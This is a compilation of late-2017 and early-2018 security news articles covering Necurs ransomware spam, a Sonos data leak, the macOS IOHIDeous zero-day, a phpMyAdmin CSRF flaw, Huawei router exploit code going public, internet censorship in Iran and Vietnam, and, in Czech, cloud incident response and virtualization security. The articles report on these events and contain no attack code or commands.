Ransomware
The Necurs botnet started 2017 with a four-month vacation, but ended the year sending tens of millions of spam emails daily as part of massive ransomware distribution campaigns.

Considered the largest spam botnet at the moment, Necurs was the main driver behind the ascension of the Locky ransomware (which in turn is associated with the Dridex banking Trojan) in 2016. As Necurs took a long vacation in the beginning of 2017, Locky was silent as well, but both resumed activity in April.

Over the course of 2017, however, the botnet was involved in the distribution of the Jaff, GlobeImposter, and Scarab ransomware families, as well as in 'pump-and-dump' schemes.

Over a 10-day period between December 19 and December 29, 2017, Necurs was once again involved in the distribution of ransomware, in addition to sending typical holiday-themed scam emails, data collected by AppRiver reveals.

The messages, AppRiver says, were distributing the Locky and GlobeImposter ransomware families and revealed the attackers’ preference to use malicious .vbs (Visual Basic Script) or .js (JavaScript) files located inside a .7z archive.

Consisting of between 5 and 6 million infected hosts and keeping around 1 or 2 million of them active at any given time, Necurs provides operators with remote access to the infected machines and can be used for various malicious activities, including malware downloads.

Starting on Dec. 19, the botnet was observed sending tens of millions of spam emails daily to distribute ransomware. It started at nearly 46 million emails on the first day (peaking at over 4.6 million messages per hour) and continued with over 47 million messages on Dec. 20 (peaking at 5.7 million per hour).

While the initial spam featured mainly .vbs files inside the .7z archive, .js files started appearing as well on the second day, and the traffic switched to .js files on Dec. 21-22, when it also started to taper off, at 36 million and 29 million messages per day, respectively. The botnet remained quiet from Dec. 23-25 and recommenced activity for only a couple of hours on Dec. 26.

“Hard to say why, however, I would hypothesize the operators may have been testing or monitoring the rate of infections and realized many workers are on vacation,” AppRiver’s David Pickett notes.

On Dec. 28-29, however, the botnet was highly active. It peaked at 6.5 million messages early morning on Dec. 28, but wasn’t active for long. On the next day, Necurs was observed sending nearly 59 million ransomware messages.

The malicious emails, the security researchers reveal, were masquerading as purchase orders and voicemails, but also claimed to contain images of interest to the intended victims.


Internet-connected Sonos Speakers Leak User Information
3.1.2017 securityweek
Vulnerebility
A vulnerability found in Internet-connected Sonos Play:1 speakers can be abused to access information on users, Trend Micro has discovered.

By exploiting the issue, an attacker could learn a user’s musical preferences, get hold of their email address, and could even learn where the user lives and whether they are at home. Additionally, an attacker could play a recorded message on the device and trick the target into downloading malware.

While analyzing the device, Trend Micro’s researchers discovered the device had only three ports open and that Sonos applications on it were pointed to a specific website, while most of the communications were performed over port TCP/1400.

Looking at the specific URI path of /status on the device, the researchers also noticed that many of its subpages were shown via a simple website. Thus, no authentication was required to access information about the tracks being played or the music libraries the device knows about.

Furthermore, the website revealed personal information such as emails associated with audio streaming services and exposed various debug functions, including “the ability to traceroute, ping, and even make an mDNS announcement via a simple website,” the researchers say. The status page can reveal other information as well.

“Let’s say an attacker knows the target uses a Sonos device. The attacker can then take the information collected here to tailor better attacks against the target. This could include mobile devices, printers, and even types of computers on the networks,” Trend Micro notes in a technical analysis (PDF).

The security researchers also discovered a series of plausible attack scenarios that could be used not only against home users, but also to target enterprise networks.

By learning the user’s musical preferences, an attacker could craft phishing emails and deliver them to the target. In a workplace environment, such an attack could be used to discover other IoT devices connected to the same network and find vulnerabilities on them to further compromise the network.

Using a website that compounds multiple sources of Wi-Fi geolocation an attacker could also find where the user lives (the researchers determined the device location by looking at the wireless access points (WAPs) the device tried to access during installation) and whether they are at home by monitoring when the speaker is activated and deactivated.

“This hybrid attack involving cyber and physical elements presents new dangers that home and enterprise users should be aware of. Devices leaking presence data not only make users easier to predict — they can also put the user at physical risk,” the researchers say.

Leveraging information discovered on the aforementioned status page, including model numbers and serial numbers, an attacker could disrupt the device and even play a crafted status message containing misleading information.

The attacker could also send tailored emails to the user (to the addresses tied to accounts on music streaming applications) and trick them into downloading malware masquerading as a software update. Using other discoverable information on the target, the attacker could add personalized information to the message to make it even more convincing.

With the help of search service Shodan, the security researchers were able to find roughly 5,000 Sonos devices exposed to the Internet. The manufacturer was informed on the findings and has already released and updated to address the discovered bugs, but some of the issues continue to impact users, Trend Micro says.

“The problem of unsecured internet-connected devices is not limited to home users but also extends to workplace environments when seemingly safe IoT devices are introduced into the company network, as was shown in the attack scenarios. Whether these devices are installed to improve productivity or are simply brought to work by employees, the risk of having an exposed and unsecured device should not be taken lightly,” Trend Micro concludes.


Former NSA hacker reversed Kaspersky Lab antivirus to compose signatures capable of detecting classified documents
2.1.2017 securityaffairs BigBrothers

Former NSA hacker, demonstrated how to subvert the Kaspersky Lab antivirus and turn it into a powerful search tool for classified documents.
The Kaspersky case demonstrated that security software can be exploited by intelligence agencies as a powerful spy tool.

Patrick Wardle, chief research officer at Digita Security and former NSA hacker, demonstrated it by subverting the Kaspersky Lab antivirus and turning it into a powerful search tool for classified documents.

“In the battle against malicious code, antivirus products are a staple,” Patrick Wardle told the New York Times. “Ironically, though, these products share many characteristics with the advanced cyberespionage collection implants they seek to detect.”

“I wanted to know if this was a feasible attack mechanism,” Mr. Wardle added. “I didn’t want to get into the complex accusations. But from a technical point of view, if an antivirus maker wanted to, was coerced to, or was hacked or somehow subverted, could it create a signature to flag classified documents?”

In December, US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.

According to a draft of a top-secret report leaked by Edward J. Snowden, the NSA at least since 2008 was targeting antivirus software (i.e. Checkpoint and Avast) to collect sensitive information stored in the target machines.

Mr. Wardle conducted a reverse-engineering of Kaspersky Lab antivirus software to explore the possibility to abuse it for intelligence purposes. The expert’s goal was to compose a signature that is able to detect classified documents.

Mr. Wardle discovered that the code incredibly complex, unlike traditional antivirus software, Kaspersky’s malware signatures are easily updated. This feature can be tweaked to automatically scan the victim’s machine and steal classified documents.

“Modern anti-virus products are incredibly complex pieces of software and Kaspersky is likely one of the most complex. Thus, merely gaining a reasonable understanding of its signatures and scanning logic is a challenging task.” wrote Wardle.

“Though the installer ships with built-in signatures, as is the case with any anti-virus program, Kaspersky’s anti-virus engine regularly checks for, and automatically installs any new signatures” “When new signatures are available, they are downloaded by the kav daemon from Kaspersky’s update servers”

Wardle found antivirus scanning could be the used for cyberespionage activities.

The expert pointed out that officials routinely classify top secret documents with the marking “TS/SCI,” (“Top Secret/Sensitive Compartmented Information),” then he added a rule to Kaspersky’s antivirus program to flag any documents that contained the “TS/SCI” marker.

To test the new rule, the researcher edited a document on his computer containing text from the Winnie the Pooh children’s book series and added “TS/SC” marker.

Kaspersky%20antivirus

As soon as the Winnie the Pooh document was saved to his machine, the Kaspersky’s antivirus software flagged and quarantined the document.

The successive phase of Wardle’s test was on discovering how flagged documents are managed, but it normal that an antivirus software send data back to the company for further analysis.

Kaspersky Lab explained that Wardle’s research is not corrected because the company is not able to deliver a specific signature or update to only one user in a stealthy way.

“It is impossible for Kaspersky Lab to deliver a specific signature or update to only one user in a secret, targeted way because all signatures are always openly available to all our users; and updates are digitally signed, further making it impossible to fake an update,” Kaspersky said in a statement.

Anyway, Wardle’s research demonstrated that hacking vendor’s platforms it is possible to use the antivirus as a search tool.

“However, a malicious or willing insider within any anti-virus company, who could tactically deployed such a signature, would likely remain undetected. And of course, in a hypothetical scenario; any anti-virus company that is coerced to, or is willing to work with a larger entity (such as a governemnt) would equally be able to stealthily leverage their product to detect and exfilitrate any files of interest.” concluded the expert.
“Sometimes the line between what is good and evil, comes down to a signal signature… “


Iran ‘s Government is reportedly blocking the Internet to calm down protests
2.1.2017 securityaffairs BigBrothers

The Iran Government is also trying to isolate the protests by blocking internet on mobile networks, authorities are blocking Instagram and messaging services like Telegram.
At least 12 people dead in the biggest challenge to the Government of the Tehran regime since mass demonstrations in 2009. The Iranian President Hassan Rouhani tried to downplay the dangerous situation, while violent protests mount across the country.

The Government is also trying to isolate the protests by blocking internet on mobile networks, multiple reports confirm the authorities are blocking social media services like Instagram and messaging services like Telegram since December 30.

“It’s a busy weekend for oppressive governments trying to suppress digital communication. Iran has blocked mobile access to at least Telegram and Instagram as it tries to thwart protests that started over economic concerns (particularly inflation), but have extended into broader resistance to the government and clerical rule.” reported the website engadget.com.

“Officials claim the censorship is meant to “maintain peace,” but the argument doesn’t hold water. Telegram founder Pavel Durov noted that his company refused to shut down “peacefully protesting channels,” and Instagram is primarily being used to document protests — Iran clearly doesn’t want to reveal the extent of the demonstrations.”


Pavel Durov

@durov
Iranian authorities are blocking access to Telegram for the majority of Iranians after our public refusal to shut down https://t.me/sedaiemardom and other peacefully protesting channels.

1:17 PM - Dec 31, 2017 · Dubai, United Arab Emirates
1,058 1,058 Replies 2,944 2,944 Retweets 5,358 5,358 likes
Twitter Ads info and privacy
The Government fears that technology could amplify the protests like happened during the Arab Spring.

“The authorities appeared to respond by cutting internet access to mobile phones, with the main networks interrupted at least in Tehran shortly before midnight” AFP reporters said.

“Several Iranian news agencies warned Telegram, the most popular social media service in the country, might soon be shut down after communications minister Mohammad-Javad Azari Jahromi accused one popular channel, Amadnews, of encouraging an “armed uprising”.”

1 Jan

Kavé Salamatian
@kavesalamatian
@bgpmon @InternetIntel Changes in Iran BGP connectivity happening right now. Seems that the full internet is getting disconnected


View%20image%20on%20Twitter
@InternetIntel
Large routing outage in Iran about 2hrs ago. pic.twitter.com/382BYEIscF

4:35 PM - Jan 1, 2018
View image on Twitter
5 5 Replies 75 75 Retweets 51 51 likes
Twitter Ads info and privacy
Iran Freedom
@4FreedominIran
#Sanandaj, January 1 - Large crowd took to streets confronting oppressive security forces. Some were arrested. (via #MEK activists in #Iran) #FreeIran #Iranprotests #IranProtests #Iran #RegimeChange

4:55 PM - Jan 1, 2018
1 1 Reply 111 111 Retweets 82 82 likes
Twitter Ads info and privacy
“How nervous the government is about losing control over the population is proportional to various control tactics they implement over the Internet,” Mahsa Alimardani, who researches internet freedoms in Iran for Article 19, told Motherboard. “In the past few hours there are also some reports of home connections (up until today mostly left undisturbed) also facing some blocks to accessing foreign web content.”

At the time I’m writing it is not clear the real effect on the Internet access by the population, in the following graph it is visible the increase in the number of directly connecting users to the Tor network.

Iran%20protests

During Iran’s elections earlier this year, Rouhani promised to cut down on censorship, but evidently, it was only political propaganda.


Force 47 – The Vietnamese brigade tasked with fighting “wrongful views” spreading online
2.1.2017 securityaffairs APT

Force 47 is a brigade composed of 10,000 cyber warriors to fight online dissent in Vietnam, a new threat to freedom of speech in the country.
Like many other Governments, also Vietnam is deploying a cyber army of 10000 cyber experts to fight online dissent in the country.

The news was revealed by a top Vietnamese general last week, the official that the brigade dubbed ‘Force 47’ has been tasked with fighting “wrongful views” spreading online.

More than half of the population (around 93 million people) has access to the Internet.

According to web watchdog Freedom House, the Internet in Vietnam is “not free”, the organization ranked it second only to China in Asia.

Human Rights Watch deputy Asia director Phil Robertson believes that the brigade Force 47 is a “shocking new dimension to Vietnam’s crackdown on dissent”.

“This is just the latest plank in a campaign to curb internet freedoms at all costs,” Shawn Crispin, Committee to Protect Journalists’ Southeast Asia representative, told AFP Friday.

“While they can’t unplug Facebook, Instagram and the likes outright, they can apply more and more pressure on those platforms and it looks like these cyber troops are their latest attempt to do that.”

The activist Nguyen Chi Tuyen (aka Anh Chi) said the new brigade is an important step in ahead of online repression.

“The main purpose for Force 47 is to try and control news and public opinion on the internet… they want to protect the party, not protect the country,” explained Tuyen.

The Vietnamese Government is applying a strict online monitoring, it continues to ask tech giants like Facebook and YouTube to remove any “toxic content” from their platforms.

The Vietnamese Government believes that hostile groups and foreign governments could use social media and the Internet to destabilize the country and threaten the “prestige of the party’s leaders and the state”.

According to Amnesty International, many dissidents have already been identified and arrested in the country, at least 15 people this year.

Madeline Earp, a senior research analyst with Freedom House, explained that the unit Force 47 is likely to include commentators tasked of spreading online pro-government content and counter critics.

“Vietnam very much follows China’s example when suppressing internet freedom, particularly when it comes to blocking websites and arresting dissidents,” she told AFP.

Vietnam had built up considerable cyber capabilities in across the years, according to the incident response firm Volexity, Vietnamese APT32 group is today one of the most advanced APTs in the threat landscape.


Expert publicly disclosed a macOS zero-day that allows local privilege escalation
2.1.2017 securityaffairs Apple

A security researcher has publicly disclosed the details of macOS zero-day flaw that can be exploited to take complete control of a system.
A security researcher that goes online with the Twitter account Siguza (@s1guza) has publicly disclosed the details of macOS zero-day vulnerability that can be exploited to take complete control of a system. The expert speculates the flaw has been around since at least 2002


Siguza
@s1guza
Fuck it, dropping a macOS 0day. Happy New Year, everyone. https://siguza.github.io/IOHIDeous/

11:59 PM - Dec 31, 2017
119 119 Replies 2,634 2,634 Retweets 4,407 4,407 likes
Twitter Ads info and privacy
The flaw is a local privilege escalation (LPE) vulnerability that affects IOHIDFamily, a kernel extension designed for human interface devices (HID) (e.g. the touchscreen, buttons, accelerometer, etc.).

The flaws discovered by the expert affect all versions of macOS and they can lead to an arbitrary read/write vulnerability in the kernel.

An attacker who has access to a system can trigger the zero-day flaw to execute arbitrary code and gain root permissions.

The expert was analyzing the iOS code searching for vulnerabilities in the iOS kernel when he discovered that the component IOHIDSystem exists only on macOS.

“I was originally looking through its source in the hope of finding a low-hanging fruit that would let me compromise an iOS kernel, but what I didn’t know it then is that some parts of IOHIDFamily exist only on macOS – specifically IOHIDSystem, which contains the vulnerability discussed herein.” Siguza wrote in the technical analysis published on gitHub.

The expert published a PoC code, dubbed IOHIDeous, that works for Sierra and High Sierra (up to 10.13.1, see README) and is able to disable both the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI).

“Targets Sierra and High Sierra (up to 10.13.1, see README), achieves full kernel r/w and disables SIP to prove that the vulnerability can be exploited by any unprivileged user on all recent versions of macOS.” continues the expert.

The exploit code developed by the expert runs as fast as possible to avoid user interaction, for example on a shutdown “we’d be able to slip in between the user getting logged out and the kernel killing us.”

macOS%20zero-day

The PoC code published by Siguza seems not work on macOS High Sierra 10.13.2 released on December 6, but the expert believes that this version is still vulnerable.

“The prefetch timing attack I’m using for hid for some reason doesn’t work on High Sierra 10.13.2 anymore, and I don’t feel like investigating that.” said Siguza.

“Maybe patched, maybe just the consequence of a random change, I neither know nor care. The vuln is still there and my code does both info leak and kernel r/w, just not in the same binary – reason is explained in the write-up. If you want that feature, consider it an exercise for the reader.”

Siguza publicly disclosed this macOS zero-day because it is exploitable only by a local attacker and because Apple bug bounty doesn’t cover it.

1 Jan

Security Around The World
@security_china
Replying to @s1guza
Can I ask, why not sell it? I'm sure some government or blackhat would have paid a lot for it? Or are you just the type of person who can't be reasoned with, who doesn't care for money and just want to watch the world burn?


Siguza
@s1guza
My primary goal was to get the write-up out for people to read. I wouldn't sell to blackhats because I don't wanna help their cause. I would've submitted to Apple if their bug bounty included macOS, or if the vuln was remotely exploitable.

3:43 PM - Jan 1, 2018
4 4 Replies 11 11 Retweets 150 150 likes


CSRF Vulnerability in phpMyAdmin allows attackers to perform DROP TABLE with a single click!
2.1.2017 securityaffairs
Vulnerebility

The development team of phpMyAdmin has fixed a CSRF vulnerability in phpMyAdmin that could be exploited by attackers for removing items from shopping cart.
Researcher Ashutosh Barot has discovered a critical CSRF vulnerability in phpMyAdmin that could be exploited by attackers to perform malicious operations like drop tables and delete records.

phpMyAdmin developers released the version 4.7.7 that addresses the CSRF vulnerability found by Barot.

“By deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables etc.” reads the security advisory published by phpMyAdmin developers.

An attacker could trick a database admin into performing database operations like DROP TABLE using CSRF with devastating consequences.

“In this case, a CSRF vulnerability allows an attacker to send a crafted URL to the victim and if she (authenticated user) clicks it, the victim may perform a DROP TABLE query on her database. phpMyAdmin team considers this issue as critical vulnerability.” reads the analysis published by Ashutosh Barot.

This means that an attacker can create a crafted URL and trick the victims having an active session into performing dangerous operations without their knowledge.

The expert discovered a feature in phpMyAdmin that uses GET requests for Database operations such as DROP TABLE table_name, this means that it is possible for an attacker to trick a database admin into clicking a button and perform a database query of the attacker’s choice.

UPLOADING%201%20/%201%20%E2%80%93%20phpMyAdmin%20hack.png%20ATTACHMENT%20DETAILS%20phpMyAdmin%20hack

Ashutosh Barot also discovered that the URL for performing database operations was being saved in the browser history, an attacker can access them to gain some information about the database.

“Any query you execute by clicking insert, DROP, etc., button as shown in above image . The URL will contain database name and table name as GET request was used to perform DB Operations. URLs are stored at various places such as browser history, SIEM logs, Firewall Logs, ISP Logs, etc. this URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!)” continues the analysis.

The expert pointed out that the CSRF attack worked even when the user was authenticated in cPanel and phpMyAdmin was closed after use.

The vulnerability is ranked as Medium severity because its exploitation needs the user interaction.

Below a video PoC published by Barot:

All versions prior 4.7.7 are affected by the vulnerability, users must update their installations or apply the following patches:

The following commits have been made on the 4.7 branch to fix this issue:

edd929216ade9f7c150a262ba3db44db0fed0e1b
The following commits have been made on the 4.8 branch to fix this issue:

72f109a99c82b14c07dcb19946ba9b76efc32a1b


Necurs Botnet Fuels Massive Year-End Ransomware Attacks
2.1.2017 securityweek
Ransomware
The Necurs botnet started 2017 with a four-month vacation, but ended the year sending tens of millions of spam emails daily as part of massive ransomware distribution campaigns.

Considered the largest spam botnet at the moment, Necurs was the main driver behind the ascension of the Locky ransomware (which in turn is associated with the Dridex banking Trojan) in 2016. As Necurs took a long vacation in the beginning of 2017, Locky was silent as well, but both resumed activity in April.

Over the course of 2017, however, the botnet was involved in the distribution of the Jaff, GlobeImposter, and Scarab ransomware families, as well as in 'pump-and-dump' schemes.

Over a 10-day period between December 19 and December 29, 2017, Necurs was once again involved in the distribution of ransomware, in addition to sending typical holiday-themed scam emails, data collected by AppRiver reveals.

The messages, AppRiver says, were distributing the Locky and GlobeImposter ransomware families and revealed the attackers’ preference to use malicious .vbs (Visual Basic Script) or .js (JavaScript) files located inside a .7z archive.

Consisting of between 5 and 6 million infected hosts and keeping around 1 or 2 million of them active at any given time, Necurs provides operators with remote access to the infected machines and can be used for various malicious activities, including malware downloads.

Starting on Dec. 19, the botnet was observed sending tens of millions of spam emails daily to distribute ransomware. It started at nearly 46 million emails on the first day (peaking at over 4.6 million messages per hour) and continued with over 47 million messages on Dec. 20 (peaking at 5.7 million per hour).

While the initial spam featured mainly .vbs files inside the .7z archive, .js files started appearing as well on the second day, and the traffic switched to .js files on Dec. 21-22, when it also started to taper off, at 36 million and 29 million messages per day, respectively. The botnet remained quiet from Dec. 23-25 and recommenced activity for only a couple of hours on Dec. 26.

“Hard to say why, however, I would hypothesize the operators may have been testing or monitoring the rate of infections and realized many workers are on vacation,” AppRiver’s David Pickett notes.

On Dec. 28-29, however, the botnet was highly active. It peaked at 6.5 million messages early morning on Dec. 28, but wasn’t active for long. On the next day, Necurs was observed sending nearly 59 million ransomware messages.

The malicious emails, the security researchers reveal, were masquerading as purchase orders and voicemails, but also claimed to contain images of interest to the intended victims.


Unpatched macOS Flaw Allows Code Execution, Root Access
2.1.2017 securityweek Apple
A researcher who specializes in hacking Apple’s iOS operating system has made public the details of an unpatched vulnerability in macOS that can be exploited to take complete control of a system.

The details of the exploit and proof-of-concept (PoC) code were made public on the first day of 2018 – or the last day of 2017, depending on where you are located in the world – by a researcher who uses the online moniker Siguza (s1guza). An attacker who has access to a system can leverage the vulnerability, which the expert has described as a “zero day,” to execute arbitrary code and obtain root permissions.

This local privilege escalation (LPE) vulnerability affects IOHIDFamily, a kernel extension designed for human interface devices (HID), such as a touchscreen or buttons. While trying to discover flaws that would let him hack the iOS kernel, Siguza noticed that some components of this extension, specifically IOHIDSystem, exist only on macOS, which led him to identify a potentially serious security hole.

The bugs he discovered affect all versions of macOS and they can lead to an arbitrary read/write vulnerability in the kernel. The exploit created by the hacker also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features.

However, the expert pointed out that his exploit, dubbed IOHIDeous, is not stealthy as it needs to force a logout of the logged-in user. On the other hand, an attacker could design an exploit that is triggered when the targeted device is manually shut down or rebooted.

Some of the PoC code made available by Siguza only works on macOS High Sierra 10.13.1 and earlier, but the researcher believes the exploit can be tweaked to work on the latest version as well, namely 10.13.2, which Apple released on December 6.

The expert believes the vulnerability has been around since at least 2002, but some clues suggest it could actually be a decade older than that. “One tiny, ugly bug. Fifteen years. Full system compromise,” Siguza said.

The researcher said he would have reported his findings to Apple instead of disclosing them to the public if the flaw had been remotely exploitable or if the tech giant’s bug bounty program covered macOS.

SecurityWeek has reached out to Apple for comment and will update this article if the company responds.

Some may argue that making the exploit public puts macOS users at risk of attacks, but Siguza believes that is not the case.

Researcher%20discloses%20macOS%20privilege%20escalation%20zero%20day

Researcher%20discloses%20macOS%20privilege%20escalation%20zero%20day

Researcher%20discloses%20macOS%20privilege%20escalation%20zero%20day


Critical Vulnerability Patched in phpMyAdmin
2.1.2017 securityweek
Vulnerebility
An update released just before the holidays by the developers of phpMyAdmin patches a serious vulnerability that can be exploited to perform harmful database operations by getting targeted administrators to click on specially crafted links.

phpMyAdmin is a free and open source tool designed for managing MySQL databases over the Internet. With more than 200,000 downloads every month, phpMyAdmin is one of the top MySQL database administration tools.

India-based researcher Ashutosh Barot discovered that phpMyAdmin is affected by a cross-site request forgery (CSRF) flaw that can be exploited by an attacker to drop tables, delete records, and perform other database operations.

For the attack to work, an authenticated admin needs to click on a specially crafted URL. However, Barot noted that the attack works as long as the user is logged in to the cPanel web hosting administration interface, even if phpMyAdmin has been closed after use.

These types of attacks are possible due to the fact that vulnerable versions of phpMyAdmin use GET requests for database operations, but fail to provide CSRF protection.

The researcher also discovered that the URLs associated with database operations performed via phpMyAdmin are stored in the web browser history, which can pose security risks.

“The URL will contain database name and table name as a GET request was used to perform DB operations,” Barot said in a blog post published on Friday. “URLs are stored at various places such as browser history, SIEM logs, firewall logs, ISP logs, etc. This URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!). Wherever the URL is being saved, an adversary can gain some information about your database.”

phpMyAdmin developers fixed the CSRF vulnerability found by Barot with the release of version 4.7.7. All prior 4.7.x versions are impacted by the security hole, which phpMyAdmin has classified as “critical.” Users have been advised to update their installations or apply the available patch.


Botnet's Huawei Router Exploit Code Now Public
2.1.2017 securityweek
Exploit
Exploit code used by the Satori botnet to compromise Huawei routers via a zero-day vulnerability became public last week, researchers have discovered.

The exploit has been used in attacks involving the Mirai variant Satori to target Huawei vulnerability CVE-2017–17215, which was unpatched at the time the first assaults started. The vulnerability was found in Huawei HG532 devices in November. Shortly after, Huawei published an advisory on how users can circumvent or prevent the exploit.

Discovered on Pastebin this Christmas, the code could fuel a spike in attempts to exploit the vulnerability. In fact, it has been already used by the destructive BrickerBot malware to target Internet of Things (IoT) devices, NewSky Security says.

In early December, the actor behind BrickerBot dumped some of the code online and announced plans to retire his project. The released code included some of the malware’s attack modules, including one that targeted said Huawei flaw, researchers have discovered.

“While analyzing this code, we also uncovered the usage of CVE-2017–17215, implying that this code has been in blackhats’ hands for a while,” NewSky reveals.

While analyzing the Satori and BrickerBot code, the security researchers noticed that the same attack vector (code injection) is present in both, which led to the conclusion that both malware developers “had copied the exploit source code from the same source.”

The security researchers also point out that the SOAP protocol (Simple Object Access Protocol) has been abused before in attacks involving IoT devices. Several Mirai variants observed last year were using two other SOAP bugs (CVE-2014–8361 and TR-64). One iteration was using them together, to increase the chances of a successful attack.

“IoT attacks are becoming modular day by day. When an IoT exploit becomes freely available, it hardly takes much time for threat actors to up their arsenal and implement the exploit as one of the attack vectors in their botnet code,” NewSky concludes.


Jak reagovat na incidenty ve věku cloudů?

2.1.2017 SecurityWorld Incidenty
Platforma pro reakce na incidenty může pomoci interním i externím týmům spolupracovat, sledovat procesy reakcí na incidenty a automatizovat důležité úlohy zabezpečení.

Většina ředitelů zabezpečení informací zažívá drsné probuzení, když se setkají se svým prvním významným bezpečnostním problémem v cloudu. Pokud zjistí kritickou zranitelnost, která vyžaduje opravu, může jim chybět povolení ke změnám v prostředí připraveném od poskytovatele cloudu. Pokud zákazník síť nevlastní, nemusí existovat způsob, jak získat podrobnosti zásadní pro vyšetření incidentu.

Aby se v cloudu zabránilo významným bezpečnostním problémům, musí mít ředitel zabezpečení informací plán reakcí na incidenty. Zde je návod, jak ho vytvořit:

1. Stanovte společný plán reakce s poskytovatelem cloudu. Pokud jste ještě do cloudu nepřešli, je nejpraktičtějším prvním krokem stanovení společného procesu reakcí. Je potřebné jasně definovat odpovědnosti a role a vzájemně si vyměnit kontaktní informace pro primární a sekundární kontakty. Získejte podrobné vysvětlení toho, co u poskytovatele vyvolává reakci na incidenty a jak bude poskytovatel řešit různé problémy.

2. Vyhodnoťte způsob monitoringu a bezpečnostní opatření používané v daném cloudu. Pro zajištění efektivní reakce na bezpečnostní problémy související s cloudovou infrastrukturou je důležité pochopit, jaký druh monitorovacích a bezpečnostních opatření používá poskytovatel cloudu a jakým způsobem jsou pro vás tyto nástroje dostupné. Pokud zjistíte, že jsou nedostatečné, hledejte způsoby, jak lze nasadit doplňující řešení, které to napraví.

3. Vytvořte plán obnovy. Rozhodněte, zda bude v případě výpadku u poskytovatele nutná obnova. Vytvořte plán obnovy, který určí, jestli se má použít alternativní poskytovatel nebo interní vybavení, a stanoví také postup pro získání a přesun dat.

4. Vyhodnoťte forenzní nástroje pro cloudovou infrastrukturu. Zjistěte, jaké nástroje jsou k dispozici od poskytovatele cloudu a z dalších zdrojů pro forenzní šetření v případě incidentu. Pokud incident zahrnuje citlivé osobní údaje, mohl by přerůst v právní problém, takže je dostupnost vhodných nástrojů pro forenzní práci a sledování důkazů zásadní.

Zvládnutí incidentu v cloudu

Při reakci na incident je mnoho kroků stejných nehledě na to, zda k němu došlo v cloudu či v interní infrastruktuře. V případě cloudového incidentu však existují některé další kroky, které je potřebné udělat:

Ihned kontaktujte tým reakce na incidenty daného poskytovatele a při komunikaci buďte důrazní. Pokud je tým poskytovatele nedostupný, udělejte v souvislosti s incidentem vše, co je ve vašich možnostech pro jeho zastavení – například kontroly připojení ke cloudové službě a v případě pochyb také zrušení uživatelského přístupu ke cloudové službě.
Pokud nelze incident kontrolovat, ani zastavit, připravte si přesun na alternativní službu nebo si nakonfigurujte svůj interní server.

Cloud vám umožní odložit identifikaci a odstranění na dobu po skončení krize. Ve většině případů můžete okamžitě zahájit obnovení produkčních služeb vytvořením nové instance.
Nejlepší postupy pro reakce na incidenty v cloudu

Jedním z kritických problémů, kterým mnoho podniků čelí, je nedostatek talentovaných pracovních sil s potřebnými schopnostmi pro správu zabezpečení. Je těžké najít vhodné kandidáty, a pokud je najdete, můžete čekat, že jim budete muset nabídnout vysoké platy. Statistický úřad ministerstva práce USA očekává, že do roku 2024 vzroste počet pracovních míst v oblasti analýz bezpečnostních informací o 18 % a průměrné platy v dolarech jsou šesticiferné již nyní.

Existují však některé kroky, které můžete udělat, abyste rychle zaškolili nové zaměstnance a zlepšili schopnosti zaměstnanců současných:

Podporujte spolupráci, která pomůže mladším analytikům učit se ze zkušeností vedoucích analytiků. Jako bonus může kooperace odhalit duplicitní činnosti, které lze odstranit.

Vytvářejte příručky, které popíšou standardní postupy pro reakce na incidenty. Samozřejmě nelze vytvořit návod pro každou možnou situaci, ale příručky mohou být cennými průvodci a vynikajícími školicími materiály. Jen nezapomínejte příručky aktualizovat, což je úloha, kterou lze často zautomatizovat.

Když už mluvíme o automatizaci, mnoho úloh je možné automatizovat, zejména pokud se opakují a jsou rutinní. Běžné úlohy zabírají nepřijatelné množství času. Automatizace může uvolnit váš personál pro důležitější úkoly.

Podporujte vznik situační všímavosti z perspektivy historické i z perspektivy reálného času. Efektivní analýza minulých incidentů vám pomůže k lepšímu rozhodování o incidentech současných.

Analyzujte incidenty a vytvořte si databázi, která pomůže určit druhy problémů, potřebné schopnosti k jejich vyřešení, frekvenci různých typů incidentů a další skutečnosti. Analýza vám může pomoci identifikovat zranitelnosti a zjistit, kde lze zabezpečení zlepšit.

Jako většina nejlepších bezpečnostních postupů pro cloudové aplikace je také reakce na incidenty společnou odpovědností. Při plánování reakcí na budoucí incidenty je zásadní zajistit dostupnost správných kontaktů, nástrojů a procesů.

Mít platformu pro reakce na incidenty, která umožňuje spolupráci interních a externích týmů, sleduje procesy reakce na incidenty a automatizuje klíčové bezpečnostní úlohy, je v čase krize nezbytné, aby bylo možné rychle problémy zastavit a efektivně na ně reagovat.


Jak (ne)bezpečná je virtualizace?

2.1.2017 SecurityWorld Zabezpečení
Firmy intenzivně využívají virtualizaci navzdory obavám z narušení bezpečnosti. Je to dobře?

Společnosti jsou s cloudem, virtualizací, a dokonce se softwarově definovanými datovými centry spokojenější, než tomu bylo v minulosti, a to navzdory obavám z narušení bezpečnosti, uvádí studie dvou technologických firem – HyTrust a Intel.

I když si nikdo nemyslí, že bezpečnostní problémy někdy zmizí, jsou firmy ochotné tolerovat rizika ve jménu agility, flexibility a nižších nákladů.

Přibližně 62 procent dotázaných manažerů, správců sítí a inženýrů očekává v letošním roce větší přijetí SDDC, což může měřitelně zvýšit virtualizaci a optimalizaci serverů, a dvě třetiny respondentů předpovídají, že se tyto implementace dokonce ještě dále zrychlí.

O bezpečnosti však nemají žádné iluze. Čtvrtina dotázaných uvedla, že zabezpečení bude i nadále překážkou, a více než polovina předpovídá pro letošní rok větší počet narušení. Ve skutečnosti jsou obavy ze zabezpečení primárním důvodem, proč zhruba polovina respondentů vůbec nevolí virtualizaci, uvádí zpráva.

Mají k obavám dobrý důvod. Jediný bod selhání ve virtualizované platformě, jako je například proniknutí do softwaru hypervizoru, který je bezprostředně nad hardwarem a funguje jako sdílené jádro pro všechno nad ním, má potenciál ke zneužití celé sítě – a nejen jednoho systému, jak tomu bývá obvykle.

„Je zde silný zájem, zejména mezi nejvyšším vedením společností, pokročit s těmito projekty, protože nabízejí jasné výhody,“ popisuje Eric Chiu, prezident a spoluzakladatel společnosti HyTrust. Příležitost ke zvýšení agility, výnosů a zisku přebíjí potřebu zvýšit bezpečnost virtuálního prostředí, dodává.

